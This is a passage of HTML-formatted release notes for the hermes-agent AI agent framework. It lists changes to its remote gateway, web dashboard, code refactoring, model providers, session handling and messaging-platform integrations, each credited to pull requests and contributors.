<li>"Restart gateway" action (renamed from "Restart messaging") surfaced in the statusbar + on messaging save/toggle toasts; rendered logs are selectable/copyable (<a href="https://github.com/NousResearch/hermes-agent/pull/49094" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49094/hovercard">#49094</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h3>Remote-gateway &amp; multi-profile</h3>
<ul>
<li><strong>Remote media relay</strong> — attach images/PDFs and display agent-written images over the network for the first time; remote-gateway file attachments via <code>file.attach</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41336" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41336/hovercard">#41336</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42634" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42634/hovercard">#42634</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Client + backend version buttons + remote-backend update flow; browse remote backend files; route global-remote profile REST calls; recover chat after sleep/wake by revalidating a stale remote backend (<a href="https://github.com/NousResearch/hermes-agent/pull/42181" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42181/hovercard">#42181</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44326" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44326/hovercard">#44326</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47011" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47011/hovercard">#47011</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41350" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41350/hovercard">#41350</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Multi-profile fallout cleanup — WS auth + cross-profile session reads; release profile backends before delete; scope session list/model switch/timer per session (<a href="https://github.com/NousResearch/hermes-agent/pull/44529" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44529/hovercard">#44529</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42613" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42613/hovercard">#42613</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41103" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41103/hovercard">#41103</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41120/hovercard">#41120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41182" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41182/hovercard">#41182</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Stream subagent activity into watch windows; keep streaming painting in unfocused secondary chat windows; recover stranded session windows (<a href="https://github.com/NousResearch/hermes-agent/pull/47060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47060/hovercard">#47060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47919" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47919/hovercard">#47919</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47655" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47655/hovercard">#47655</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>)</li>
</ul>
<h2>📊 Web Dashboard</h2>
<ul>
<li>Full-featured profile builder (model + skills + MCPs); unify multi-profile management — one machine dashboard + global profile switcher; profile-scoped skills &amp; toolsets; session switcher panel on the Chat tab (<a href="https://github.com/NousResearch/hermes-agent/pull/39084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39084/hovercard">#39084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44007/hovercard">#44007</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43808" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43808/hovercard">#43808</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49077" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49077/hovercard">#49077</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Skills hub browser rehaul — connected hubs, featured, preview + security scan; SKILL.md editor on Skills page + attach-skill selector in cron modals; full per-MCP catalog detail; full tool-backend config in the GUI (<a href="https://github.com/NousResearch/hermes-agent/pull/40384" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40384/hovercard">#40384</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44231" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44231/hovercard">#44231</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48520" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48520/hovercard">#48520</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40418" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40418/hovercard">#40418</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Enable webhooks from the Webhooks page; idempotent <code>hermes dashboard register</code>; auto-restart gateway after Telegram QR onboarding; file browser; change UI font from the theme picker; reasoning-effort picker in the chat sidebar (<a href="https://github.com/NousResearch/hermes-agent/pull/44021" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44021/hovercard">#44021</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42455/hovercard">#42455</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43424" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43424/hovercard">#43424</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43512/hovercard">#43512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41145" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41145/hovercard">#41145</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49141" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49141/hovercard">#49141</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🏗️ Core Agent &amp; Architecture</h2>
<h3>God-file refactor wave (run_agent.py / cli.py / gateway/run.py)</h3>
<ul>
<li><strong><code>cli.py</code> main() 3297 → 954 lines</strong> — extracted 28 subcommand parsers into <code>hermes_cli/subcommands/</code>, then promoted 9 closure handlers; 32 slash-command handlers → <code>CLICommandsMixin</code>; 18 model-flow wizard functions → <code>model_setup_flows</code>; agent-construction cluster → <code>CLIAgentSetupMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41798" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41798/hovercard">#41798</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41835/hovercard">#41835</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41942" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41942/hovercard">#41942</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42174" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42174/hovercard">#42174</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42153" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42153/hovercard">#42153</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>gateway/run.py</code> 19157 → 15870 lines</strong> — 42 slash-command handlers → <code>GatewaySlashCommandsMixin</code>; authorization cluster → <code>GatewayAuthorizationMixin</code>; kanban watcher loops → <code>GatewayKanbanWatchersMixin</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41886" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41886/hovercard">#41886</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42159" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42159/hovercard">#42159</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41849/hovercard">#41849</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>run_agent.py</code> turn loop</strong> — extracted prologue into <code>TurnContext</code>, post-loop tail into <code>finalize_turn</code>, consolidated inner-retry-loop recovery flags into <code>TurnRetryState</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41778/hovercard">#41778</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42169" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42169/hovercard">#42169</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41828" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41828/hovercard">#41828</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Agent loop, prompt &amp; tools</h3>
<ul>
<li><strong><code>memory</code> batch operations</strong> — atomic add/replace/remove array against the final char budget, so a single call can free space and add entries (<a href="https://github.com/NousResearch/hermes-agent/pull/48507" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48507/hovercard">#48507</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong><code>search_files</code> lossless densification</strong> — headroom evaluation report + the one densification improvement worth shipping (fewer tokens per result, same matches) (<a href="https://github.com/NousResearch/hermes-agent/pull/47866" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47866/hovercard">#47866</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Removed the agent-callable <code>send_message</code> tool; coding-context posture across CLI/TUI/desktop/ACP; <code>read_file</code> extracts <code>.ipynb</code>/<code>.docx</code>/<code>.xlsx</code> to text (<a href="https://github.com/NousResearch/hermes-agent/pull/47856" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47856/hovercard">#47856</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43316/hovercard">#43316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37082" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37082/hovercard">#37082</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Context-file handling: configurable truncation limit + warnings; scale context-file cap to model window + point agent at the truncated file (<a href="https://github.com/NousResearch/hermes-agent/pull/47251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47251/hovercard">#47251</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47846/hovercard">#47846</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Compression: temporal anchoring in compaction summaries; raise compaction trigger to 85% for gpt-5.5 on Codex OAuth (<a href="https://github.com/NousResearch/hermes-agent/pull/41102" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41102/hovercard">#41102</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40957/hovercard">#40957</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Adaptive middleware (consumed by NeMo-Relay observer telemetry); usable mid-turn steer — desktop affordance + trusted injection (<a href="https://github.com/NousResearch/hermes-agent/pull/29724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/29724/hovercard">#29724</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40240" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40240/hovercard">#40240</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Provider &amp; model support</h3>
<ul>
<li>New models: <code>z-ai/glm-5.2</code> (verified 1M context, OpenRouter + Nous), <code>anthropic/claude-fable-5</code>, <code>laguna-m.1</code> + <code>nemotron-3-ultra</code>, xAI Composer 2.5 in the OAuth picker; default xAI to <code>grok-build-0.1</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/47391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47391/hovercard">#47391</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45695" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45695/hovercard">#45695</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42979/hovercard">#42979</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42629" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42629/hovercard">#42629</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47908" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47908/hovercard">#47908</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47371/hovercard">#47371</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Model picker: Refresh-Models control to bust stale cache; persist Nous recommended-models to disk + fall back on Portal failure; seed catalog disk cache from checkout on update; MiniMax-M3 reports true 1M context (<a href="https://github.com/NousResearch/hermes-agent/pull/48691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48691/hovercard">#48691</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42628" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42628/hovercard">#42628</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42614/hovercard">#42614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43338" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43338/hovercard">#43338</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Anthropic adaptive models: default to modern thinking contract; never send <code>reasoning</code> field; route <code>reasoning_effort</code> to verbosity; require confirmation for very expensive selections (<a href="https://github.com/NousResearch/hermes-agent/pull/42991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42991/hovercard">#42991</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43012/hovercard">#43012</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43436" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43436/hovercard">#43436</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43391" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43391/hovercard">#43391</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Auth: auto-detect OpenRouter credential from the pool; keep Codex OAuth pool accounts distinct on add/re-auth; resolve xAI OAuth across profiles + write rotated tokens back to root; honor <code>model.default_headers</code> for custom OpenAI-compatible providers (<a href="https://github.com/NousResearch/hermes-agent/pull/42263" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42263/hovercard">#42263</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42316" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42316/hovercard">#42316</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46614" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46614/hovercard">#46614</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41096" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41096/hovercard">#41096</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Bedrock falls back to non-streaming <code>InvokeModel</code> when IAM denies the streaming variant; Ollama default <code>max_tokens=65536</code>; surface model refusals as <code>content_filter</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/44293" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44293/hovercard">#44293</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41694" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41694/hovercard">#41694</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46013" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46013/hovercard">#46013</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Sessions, state &amp; multi-agent</h3>
<ul>
<li>Optional <strong>max session cap</strong>; drop empty sessions on CLI exit and rotation; ACP session-provenance metadata for compression rotation (<a href="https://github.com/NousResearch/hermes-agent/pull/42389" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42389/hovercard">#42389</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43855" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43855/hovercard">#43855</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41724" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41724/hovercard">#41724</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Delegation: resolve custom-endpoint subagent pools by endpoint identity; remove the default subagent wall-clock timeout; stop subagent completion lines leaking into parent CLI display (<a href="https://github.com/NousResearch/hermes-agent/pull/41730" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41730/hovercard">#41730</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45149" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45149/hovercard">#45149</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44223" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44223/hovercard">#44223</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Kanban: config-gated auto-subscribe on <code>kanban_create</code>; machine-global singleton lock for the embedded dispatcher; pin assigned profile toolsets for workers; hold reclaim while worker still alive (<a href="https://github.com/NousResearch/hermes-agent/pull/48635" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48635/hovercard">#48635</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49068" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49068/hovercard">#49068</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45590" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45590/hovercard">#45590</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49064" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49064/hovercard">#49064</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Memory: configurable Hindsight retain observation scopes; OpenViking setup UX; Honcho gateway-gated identity tree; Supermemory session-level ingest (<a href="https://github.com/NousResearch/hermes-agent/pull/46611" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46611/hovercard">#46611</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48262" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48262/hovercard">#48262</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44431" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44431/hovercard">#44431</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38756" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38756/hovercard">#38756</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>)</li>
</ul>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New channels</h3>
<ul>
<li><strong>iMessage via Photon Spectrum</strong> — <code>hermes photon login</code> (device-code OAuth), gRPC-native channel (no webhook), markdown rendering, emoji reactions, outbound media via spectrum-ts (<a href="https://github.com/NousResearch/hermes-agent/pull/32348" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/32348/hovercard">#32348</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42582" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42582/hovercard">#42582</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44713" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44713/hovercard">#44713</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42397/hovercard">#42397</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>WhatsApp Business Cloud API</strong> adapter (official, no bridge process) (<a href="https://github.com/NousResearch/hermes-agent/pull/44331" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44331/hovercard">#44331</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43921" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43921/hovercard">#43921</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>SimpleX</strong> — groups, native attachments, text batching, auto-accept; <strong>Raft</strong> bundled platform plugin with activity hooks (<a href="https://github.com/NousResearch/hermes-agent/pull/42584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42584/hovercard">#42584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48210" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48210/hovercard">#48210</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h3>Gateway core &amp; rendering</h3>
<ul>
<li>Render terminal tool calls as native bash code blocks on markdown platforms; bare fenced code blocks in chat; optional message timestamps for LLM context; configurable <code>tool_progress_grouping</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/41215" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41215/hovercard">#41215</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42576" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42576/hovercard">#42576</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47253" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47253/hovercard">#47253</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47228" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47228/hovercard">#47228</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Telegram: Bot API 10.1 rich messages (now always-on with opt-out); opt-in Online/Offline bot status indicator; stop cutting long streamed responses; MarkdownV2 on progress edits; gate oversized voice/audio before download (<a href="https://github.com/NousResearch/hermes-agent/pull/44829" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44829/hovercard">#44829</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45584" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45584/hovercard">#45584</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49134" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49134/hovercard">#49134</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43761" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43761/hovercard">#43761</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44245" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44245/hovercard">#44245</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
